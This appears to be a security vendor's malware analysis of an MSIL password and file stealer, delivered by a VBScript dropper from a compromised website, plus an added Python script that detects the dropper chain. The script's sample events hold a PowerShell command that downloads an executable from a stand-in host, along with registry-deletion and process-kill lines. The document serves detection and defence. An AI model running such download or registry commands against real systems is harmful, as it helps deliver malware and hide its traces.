The Zscaler ThreatLabZ team has uncovered a new password stealer malware variant being delivered through a compromised website. The payload is compiled to Microsoft Intermediate Language (MSIL) and steals passwords from the victim's system, browsers, and FTP software.
The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe.
The delivery method for this malware is a VBScript file, which downloads the payload from the compromised website and then downloads a decoy document to make the victim believe the downloaded files are legitimate. The VBScript file performs the following activities:
- Downloads a decoy document
- Terminates the Microsoft Word process
- Downloads the payload through a PowerShell command
- Removes Microsoft Word's document recovery entries from the registry
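As an added example that is not part of the Zscaler post, the delivery chain above can be turned into a behavioural detection: the script below correlates constructed Sysmon-style process-creation events and flags a wscript.exe/cscript.exe host beneath which a PowerShell download, a Word termination and a change to Word's registry keys all occur. The event field names, the sample events and the Word "Resiliency" registry path are assumptions.

```python
"""Added example: correlate the VBScript dropper behaviours listed above from
Sysmon-style process-creation events (pid, ppid, image, cmdline). All events
below are constructed; the Word 'Resiliency' registry path is an assumption."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# behaviour -> (image basename, regex that must match the lower-cased command line)
INDICATORS = {
    "download": ("powershell.exe", r"downloadfile|downloadstring|invoke-webrequest|bitstransfer"),
    "kill_word": ("taskkill.exe", r"winword"),
    "word_registry": ("reg.exe", r"\\office\\.*\\word"),
}
# Constructed sample: one script host driving all three behaviours (one via a cmd.exe hop), plus noise.
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\notice.vbs"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c powershell ..."},
    {"pid": 202, "ppid": 201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/c.exe','C:\\Temp\\conhost.exe')"},
    {"pid": 203, "ppid": 200, "image": r"C:\Windows\System32\taskkill.exe", "cmdline": "taskkill /F /IM winword.exe"},
    {"pid": 204, "ppid": 200, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg delete HKCU\Software\Microsoft\Office\16.0\Word\Resiliency /f"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

def _base(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def _script_host_ancestor(event, by_pid, max_depth=4):
    """Nearest wscript/cscript ancestor, so an intermediate cmd.exe hop is not missed."""
    for _ in range(max_depth):
        event = by_pid.get(event["ppid"])
        if event is None or _base(event["image"]) in SCRIPT_HOSTS:
            return event
    return None

def script_host_chains(events):
    """Map each script-host pid to the set of dropper behaviours observed beneath it."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        host = _script_host_ancestor(e, by_pid)
        if host is None:
            continue
        image, cmd = _base(e["image"]), e["cmdline"].lower()
        for name, (want_image, pattern) in INDICATORS.items():
            if image == want_image and re.search(pattern, cmd):
                hits.setdefault(host["pid"], set()).add(name)
    return hits

def suspicious_hosts(events, min_hits=2):
    """Script hosts showing at least min_hits behaviours; all three is the full dropper chain."""
    return {pid: sorted(h) for pid, h in script_host_chains(events).items() if len(h) >= min_hits}
```

Requiring two or more of the three behaviours under one script host keeps a lone PowerShell download (common in admin scripts) from firing on its own.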
Figure 1: Screen capture of VBScript activity
Figure 2: Screen capture of the decoy document
The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions.
Once executed, the malware performs a number of password-stealing activities, such as checking for installed antivirus products and examining the directories and files from which it will harvest information. Its most interesting function is that it also behaves like a file stealer: it enumerates files and folders, searches them for strings of interest, and uploads any sensitive information it finds to the malware's C&C server (Figures 3 to 5):
Figure 3: Checking for installed antivirus products
Figure 4: Looking at directories and files for stealing passwords and collecting information
Figure 5: Searching the system for strings of interest by enumerating files and folders, then uploading to the C&C
The following screen captures show the file extensions that the malware targets on the victim's machine when stealing credentials:
Figure 5: Strings of extensions
Figure 6: Strings of extensions
The screen captures below show snippets of the code that steals passwords from various browsers and applications before uploading them to the C&C server:
Figure 7: Chrome password stealer
Figure 8: Uploading to the C&C server
Figure 9: CuteFTP password stealer
Figure 10: Electrum Bitcoin password stealer
Figure 11: Firefox password stealer
The malware steals passwords from the following software and browsers:
- Armory Wallet
- Electrum Bitcoin wallet
- WinSCP
Figure 12: Network information
Below is a snapshot of the data stolen from the victim's machine by the malware author:
Figure 13: Stolen data
This is yet another infostealer that attempts to steal stored credentials from a victim's machine. The malware also contains modules to steal sensitive files such as private keys, SSH keys, and bitcoin wallets. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.
The Zscaler Cloud Sandbox report highlighting the indicators is shown in the screenshot below:
Figure 14: Zscaler Cloud Sandbox malware report